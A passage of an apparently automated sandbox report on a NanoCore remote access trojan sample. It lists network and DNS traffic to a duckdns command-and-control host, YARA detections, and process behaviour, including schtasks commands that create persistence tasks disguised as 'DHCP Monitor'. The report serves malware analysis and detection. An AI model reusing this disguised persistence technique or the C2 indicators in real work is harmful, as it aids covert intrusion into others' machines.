          Apr 9, 2021 01:10:02.859683037 CEST768849791213.208.152.210192.168.2.4

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Apr 9, 2021 01:07:48.308937073 CEST6464653192.168.2.48.8.8.8
          Apr 9, 2021 01:07:48.322262049 CEST53646468.8.8.8192.168.2.4
          Apr 9, 2021 01:07:48.703804016 CEST6529853192.168.2.48.8.8.8
          Apr 9, 2021 01:07:48.735263109 CEST53652988.8.8.8192.168.2.4
          Apr 9, 2021 01:07:49.046216011 CEST5912353192.168.2.48.8.8.8
          Apr 9, 2021 01:07:49.058747053 CEST53591238.8.8.8192.168.2.4
          Apr 9, 2021 01:07:49.125768900 CEST5453153192.168.2.48.8.8.8
          Apr 9, 2021 01:07:49.147308111 CEST53545318.8.8.8192.168.2.4
          Apr 9, 2021 01:07:49.767405987 CEST4971453192.168.2.48.8.8.8
          Apr 9, 2021 01:07:49.780075073 CEST53497148.8.8.8192.168.2.4
          Apr 9, 2021 01:07:50.543967009 CEST5802853192.168.2.48.8.8.8
          Apr 9, 2021 01:07:50.564155102 CEST53580288.8.8.8192.168.2.4
          Apr 9, 2021 01:07:51.460773945 CEST5309753192.168.2.48.8.8.8
          Apr 9, 2021 01:07:51.473685026 CEST53530978.8.8.8192.168.2.4
          Apr 9, 2021 01:07:52.154879093 CEST4925753192.168.2.48.8.8.8
          Apr 9, 2021 01:07:52.167908907 CEST53492578.8.8.8192.168.2.4
          Apr 9, 2021 01:07:52.906627893 CEST6238953192.168.2.48.8.8.8
          Apr 9, 2021 01:07:52.919509888 CEST53623898.8.8.8192.168.2.4
          Apr 9, 2021 01:07:53.756854057 CEST4991053192.168.2.48.8.8.8
          Apr 9, 2021 01:07:53.770009041 CEST53499108.8.8.8192.168.2.4
          Apr 9, 2021 01:07:55.434540987 CEST5585453192.168.2.48.8.8.8
          Apr 9, 2021 01:07:55.446664095 CEST53558548.8.8.8192.168.2.4
          Apr 9, 2021 01:07:56.471210957 CEST6454953192.168.2.48.8.8.8
          Apr 9, 2021 01:07:56.483896971 CEST53645498.8.8.8192.168.2.4
          Apr 9, 2021 01:07:57.667022943 CEST6315353192.168.2.48.8.8.8
          Apr 9, 2021 01:07:57.681679010 CEST53631538.8.8.8192.168.2.4
          Apr 9, 2021 01:07:59.537436962 CEST5299153192.168.2.48.8.8.8
          Apr 9, 2021 01:07:59.550411940 CEST53529918.8.8.8192.168.2.4
          Apr 9, 2021 01:08:00.450153112 CEST5370053192.168.2.48.8.8.8
          Apr 9, 2021 01:08:00.463025093 CEST53537008.8.8.8192.168.2.4
          Apr 9, 2021 01:08:01.468883991 CEST5172653192.168.2.48.8.8.8
          Apr 9, 2021 01:08:01.481945992 CEST53517268.8.8.8192.168.2.4
          Apr 9, 2021 01:08:02.088749886 CEST5679453192.168.2.48.8.8.8
          Apr 9, 2021 01:08:02.262785912 CEST5653453192.168.2.48.8.8.8
          Apr 9, 2021 01:08:02.270627022 CEST53567948.8.8.8192.168.2.4
          Apr 9, 2021 01:08:02.277312040 CEST53565348.8.8.8192.168.2.4
          Apr 9, 2021 01:08:03.587178946 CEST5662753192.168.2.48.8.8.8
          Apr 9, 2021 01:08:03.600624084 CEST53566278.8.8.8192.168.2.4
          Apr 9, 2021 01:08:04.384593964 CEST5662153192.168.2.48.8.8.8
          Apr 9, 2021 01:08:04.397150040 CEST53566218.8.8.8192.168.2.4
          Apr 9, 2021 01:08:05.193519115 CEST6311653192.168.2.48.8.8.8
          Apr 9, 2021 01:08:05.205976963 CEST53631168.8.8.8192.168.2.4
          Apr 9, 2021 01:08:06.646678925 CEST6407853192.168.2.48.8.8.8
          Apr 9, 2021 01:08:06.660923958 CEST53640788.8.8.8192.168.2.4
          Apr 9, 2021 01:08:07.447942972 CEST6480153192.168.2.48.8.8.8
          Apr 9, 2021 01:08:07.633944988 CEST53648018.8.8.8192.168.2.4
          Apr 9, 2021 01:08:12.788408995 CEST6172153192.168.2.48.8.8.8
          Apr 9, 2021 01:08:12.802980900 CEST53617218.8.8.8192.168.2.4
          Apr 9, 2021 01:08:16.958344936 CEST5125553192.168.2.48.8.8.8
          Apr 9, 2021 01:08:16.971411943 CEST53512558.8.8.8192.168.2.4
          Apr 9, 2021 01:08:17.934674978 CEST6152253192.168.2.48.8.8.8
          Apr 9, 2021 01:08:17.947594881 CEST53615228.8.8.8192.168.2.4
          Apr 9, 2021 01:08:22.457528114 CEST5233753192.168.2.48.8.8.8
          Apr 9, 2021 01:08:22.475927114 CEST53523378.8.8.8192.168.2.4
          Apr 9, 2021 01:08:23.145405054 CEST5504653192.168.2.48.8.8.8
          Apr 9, 2021 01:08:23.325608969 CEST53550468.8.8.8192.168.2.4
          Apr 9, 2021 01:08:28.906090975 CEST4961253192.168.2.48.8.8.8
          Apr 9, 2021 01:08:28.918818951 CEST53496128.8.8.8192.168.2.4
          Apr 9, 2021 01:08:34.050785065 CEST4928553192.168.2.48.8.8.8
          Apr 9, 2021 01:08:34.064754963 CEST53492858.8.8.8192.168.2.4
          Apr 9, 2021 01:08:37.794886112 CEST5060153192.168.2.48.8.8.8
          Apr 9, 2021 01:08:37.885232925 CEST53506018.8.8.8192.168.2.4
          Apr 9, 2021 01:08:38.373080015 CEST6087553192.168.2.48.8.8.8
          Apr 9, 2021 01:08:38.449672937 CEST53608758.8.8.8192.168.2.4
          Apr 9, 2021 01:08:38.889656067 CEST5644853192.168.2.48.8.8.8
          Apr 9, 2021 01:08:38.904063940 CEST53564488.8.8.8192.168.2.4
          Apr 9, 2021 01:08:39.167108059 CEST5917253192.168.2.48.8.8.8
          Apr 9, 2021 01:08:39.185307980 CEST6242053192.168.2.48.8.8.8
          Apr 9, 2021 01:08:39.193701029 CEST53591728.8.8.8192.168.2.4
          Apr 9, 2021 01:08:39.198570967 CEST53624208.8.8.8192.168.2.4
          Apr 9, 2021 01:08:39.252386093 CEST6057953192.168.2.48.8.8.8
          Apr 9, 2021 01:08:39.358108997 CEST53605798.8.8.8192.168.2.4
          Apr 9, 2021 01:08:39.769283056 CEST5018353192.168.2.48.8.8.8
          Apr 9, 2021 01:08:39.782944918 CEST53501838.8.8.8192.168.2.4
          Apr 9, 2021 01:08:40.212387085 CEST6153153192.168.2.48.8.8.8
          Apr 9, 2021 01:08:40.226979017 CEST53615318.8.8.8192.168.2.4
          Apr 9, 2021 01:08:40.567267895 CEST4922853192.168.2.48.8.8.8
          Apr 9, 2021 01:08:40.584165096 CEST53492288.8.8.8192.168.2.4
          Apr 9, 2021 01:08:41.188708067 CEST5979453192.168.2.48.8.8.8
          Apr 9, 2021 01:08:41.201442957 CEST53597948.8.8.8192.168.2.4
          Apr 9, 2021 01:08:41.898530960 CEST5591653192.168.2.48.8.8.8
          Apr 9, 2021 01:08:41.913628101 CEST53559168.8.8.8192.168.2.4
          Apr 9, 2021 01:08:42.309269905 CEST5275253192.168.2.48.8.8.8
          Apr 9, 2021 01:08:42.322654009 CEST53527528.8.8.8192.168.2.4
          Apr 9, 2021 01:08:44.320179939 CEST6054253192.168.2.48.8.8.8
          Apr 9, 2021 01:08:44.333240032 CEST53605428.8.8.8192.168.2.4
          Apr 9, 2021 01:08:49.492639065 CEST6068953192.168.2.48.8.8.8
          Apr 9, 2021 01:08:49.505250931 CEST53606898.8.8.8192.168.2.4
          Apr 9, 2021 01:08:54.652204037 CEST6420653192.168.2.48.8.8.8
          Apr 9, 2021 01:08:54.665515900 CEST53642068.8.8.8192.168.2.4
          Apr 9, 2021 01:08:59.848192930 CEST5090453192.168.2.48.8.8.8
          Apr 9, 2021 01:08:59.861691952 CEST53509048.8.8.8192.168.2.4
          Apr 9, 2021 01:09:05.433816910 CEST5752553192.168.2.48.8.8.8
          Apr 9, 2021 01:09:05.449538946 CEST53575258.8.8.8192.168.2.4
          Apr 9, 2021 01:09:10.603766918 CEST5381453192.168.2.48.8.8.8
          Apr 9, 2021 01:09:10.616873980 CEST53538148.8.8.8192.168.2.4
          Apr 9, 2021 01:09:15.773886919 CEST5341853192.168.2.48.8.8.8
          Apr 9, 2021 01:09:15.968554020 CEST53534188.8.8.8192.168.2.4
          Apr 9, 2021 01:09:21.101937056 CEST6283353192.168.2.48.8.8.8
          Apr 9, 2021 01:09:21.115186930 CEST53628338.8.8.8192.168.2.4
          Apr 9, 2021 01:09:23.917705059 CEST5926053192.168.2.48.8.8.8
          Apr 9, 2021 01:09:23.930465937 CEST53592608.8.8.8192.168.2.4
          Apr 9, 2021 01:09:26.312844038 CEST4994453192.168.2.48.8.8.8
          Apr 9, 2021 01:09:26.494016886 CEST53499448.8.8.8192.168.2.4
          Apr 9, 2021 01:09:26.608517885 CEST6330053192.168.2.48.8.8.8
          Apr 9, 2021 01:09:26.622071981 CEST53633008.8.8.8192.168.2.4
          Apr 9, 2021 01:09:31.624968052 CEST6144953192.168.2.48.8.8.8
          Apr 9, 2021 01:09:31.638266087 CEST53614498.8.8.8192.168.2.4
          Apr 9, 2021 01:09:36.777276993 CEST5127553192.168.2.48.8.8.8
          Apr 9, 2021 01:09:36.790810108 CEST53512758.8.8.8192.168.2.4
          Apr 9, 2021 01:09:42.026740074 CEST6349253192.168.2.48.8.8.8
          Apr 9, 2021 01:09:42.040246010 CEST53634928.8.8.8192.168.2.4
          Apr 9, 2021 01:09:47.194799900 CEST5894553192.168.2.48.8.8.8
          Apr 9, 2021 01:09:47.376025915 CEST53589458.8.8.8192.168.2.4
          Apr 9, 2021 01:09:52.566468000 CEST6077953192.168.2.48.8.8.8
          Apr 9, 2021 01:09:52.581572056 CEST53607798.8.8.8192.168.2.4
          Apr 9, 2021 01:09:57.700588942 CEST6401453192.168.2.48.8.8.8
          Apr 9, 2021 01:09:57.713606119 CEST53640148.8.8.8192.168.2.4
          Apr 9, 2021 01:09:57.835365057 CEST5709153192.168.2.48.8.8.8
          Apr 9, 2021 01:09:57.847999096 CEST53570918.8.8.8192.168.2.4
          Apr 9, 2021 01:10:02.821433067 CEST5590453192.168.2.48.8.8.8
          Apr 9, 2021 01:10:02.834716082 CEST53559048.8.8.8192.168.2.4

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
          Apr 9, 2021 01:08:02.088749886 CEST192.168.2.48.8.8.80x5006Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:08:07.447942972 CEST192.168.2.48.8.8.80x5666Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:08:12.788408995 CEST192.168.2.48.8.8.80x54e2Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:08:17.934674978 CEST192.168.2.48.8.8.80xca88Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:08:23.145405054 CEST192.168.2.48.8.8.80xa922Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:08:28.906090975 CEST192.168.2.48.8.8.80x556cStandard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:08:34.050785065 CEST192.168.2.48.8.8.80x5972Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:08:39.185307980 CEST192.168.2.48.8.8.80x9ea3Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:08:44.320179939 CEST192.168.2.48.8.8.80x5c7aStandard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:08:49.492639065 CEST192.168.2.48.8.8.80x5d10Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:08:54.652204037 CEST192.168.2.48.8.8.80x719dStandard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:08:59.848192930 CEST192.168.2.48.8.8.80x5d95Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:09:05.433816910 CEST192.168.2.48.8.8.80xd355Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:09:10.603766918 CEST192.168.2.48.8.8.80x6528Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:09:15.773886919 CEST192.168.2.48.8.8.80xb0e7Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:09:21.101937056 CEST192.168.2.48.8.8.80x711bStandard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:09:26.312844038 CEST192.168.2.48.8.8.80x6f6eStandard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:09:31.624968052 CEST192.168.2.48.8.8.80x84a2Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:09:36.777276993 CEST192.168.2.48.8.8.80x2cacStandard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:09:42.026740074 CEST192.168.2.48.8.8.80xae6aStandard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:09:47.194799900 CEST192.168.2.48.8.8.80x5a3cStandard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:09:52.566468000 CEST192.168.2.48.8.8.80x90a0Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:09:57.700588942 CEST192.168.2.48.8.8.80x219bStandard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
          Apr 9, 2021 01:10:02.821433067 CEST192.168.2.48.8.8.80x2c4bStandard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
          Apr 9, 2021 01:08:02.270627022 CEST8.8.8.8192.168.2.40x5006No error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:08:07.633944988 CEST8.8.8.8192.168.2.40x5666No error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:08:12.802980900 CEST8.8.8.8192.168.2.40x54e2No error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:08:17.947594881 CEST8.8.8.8192.168.2.40xca88No error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:08:23.325608969 CEST8.8.8.8192.168.2.40xa922No error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:08:28.918818951 CEST8.8.8.8192.168.2.40x556cNo error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:08:34.064754963 CEST8.8.8.8192.168.2.40x5972No error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:08:39.198570967 CEST8.8.8.8192.168.2.40x9ea3No error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:08:44.333240032 CEST8.8.8.8192.168.2.40x5c7aNo error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:08:49.505250931 CEST8.8.8.8192.168.2.40x5d10No error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:08:54.665515900 CEST8.8.8.8192.168.2.40x719dNo error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:08:59.861691952 CEST8.8.8.8192.168.2.40x5d95No error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:09:05.449538946 CEST8.8.8.8192.168.2.40xd355No error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:09:10.616873980 CEST8.8.8.8192.168.2.40x6528No error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:09:15.968554020 CEST8.8.8.8192.168.2.40xb0e7No error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:09:21.115186930 CEST8.8.8.8192.168.2.40x711bNo error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:09:26.494016886 CEST8.8.8.8192.168.2.40x6f6eNo error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:09:31.638266087 CEST8.8.8.8192.168.2.40x84a2No error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:09:36.790810108 CEST8.8.8.8192.168.2.40x2cacNo error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:09:42.040246010 CEST8.8.8.8192.168.2.40xae6aNo error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:09:47.376025915 CEST8.8.8.8192.168.2.40x5a3cNo error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:09:52.581572056 CEST8.8.8.8192.168.2.40x90a0No error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:09:57.713606119 CEST8.8.8.8192.168.2.40x219bNo error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)
          Apr 9, 2021 01:10:02.834716082 CEST8.8.8.8192.168.2.40x2c4bNo error (0)chinomso.duckdns.org213.208.152.210A (IP address)IN (0x0001)

          Code Manipulations

          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          Analysis Process: nanocore.exe PID: 7064 Parent PID: 5956

          General

          Start time:01:07:54
          Start date:09/04/2021
          Path:C:\Users\user\Desktop\nanocore.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\nanocore.exe'
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Reputation:low

          Chronological Activities

          Analysis Process: nanocore.exe PID: 7104 Parent PID: 7064

          General

          Start time:01:07:55
          Start date:09/04/2021
          Path:C:\Users\user\Desktop\nanocore.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\nanocore.exe'
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.905801654.0000000002531000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.909667904.0000000005820000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.909667904.0000000005820000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.906581049.00000000035AC000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.906581049.00000000035AC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Reputation:low

          Chronological Activities

          Analysis Process: schtasks.exe PID: 5800 Parent PID: 7104

          General

          Start time:01:07:59
          Start date:09/04/2021
          Path:C:\Windows\SysWOW64\schtasks.exe
          Wow64 process (32bit):true
          Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp'
          Imagebase:0x1110000
          File size:185856 bytes
          MD5 hash:15FF7D8324231381BAD48A052F85DF04
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Chronological Activities

          Analysis Process: conhost.exe PID: 5820 Parent PID: 5800

          General

          Start time:01:08:00
          Start date:09/04/2021
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff724c50000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Chronological Activities

          Analysis Process: schtasks.exe PID: 5108 Parent PID: 7104

          General

          Start time:01:08:00
          Start date:09/04/2021
          Path:C:\Windows\SysWOW64\schtasks.exe
          Wow64 process (32bit):true
          Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp3B81.tmp'
          Imagebase:0x1110000
          File size:185856 bytes
          MD5 hash:15FF7D8324231381BAD48A052F85DF04
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Chronological Activities

          Analysis Process: conhost.exe PID: 4476 Parent PID: 5108

          General

          Start time:01:08:00
          Start date:09/04/2021
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff724c50000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Chronological Activities

          Analysis Process: nanocore.exe PID: 4108 Parent PID: 968

          General

          Start time:01:08:01
          Start date:09/04/2021
          Path:C:\Users\user\Desktop\nanocore.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\nanocore.exe 0
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Reputation:low

          Chronological Activities

          Analysis Process: dhcpmon.exe PID: 5752 Parent PID: 968

          General

          Start time:01:08:02
          Start date:09/04/2021
          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Wow64 process (32bit):true
          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Antivirus matches:
          • Detection: 34%, ReversingLabs
          Reputation:low

          Chronological Activities

          Analysis Process: nanocore.exe PID: 5904 Parent PID: 4108

          General

          Start time:01:08:02
          Start date:09/04/2021
          Path:C:\Users\user\Desktop\nanocore.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\nanocore.exe 0
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.684361480.0000000002510000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
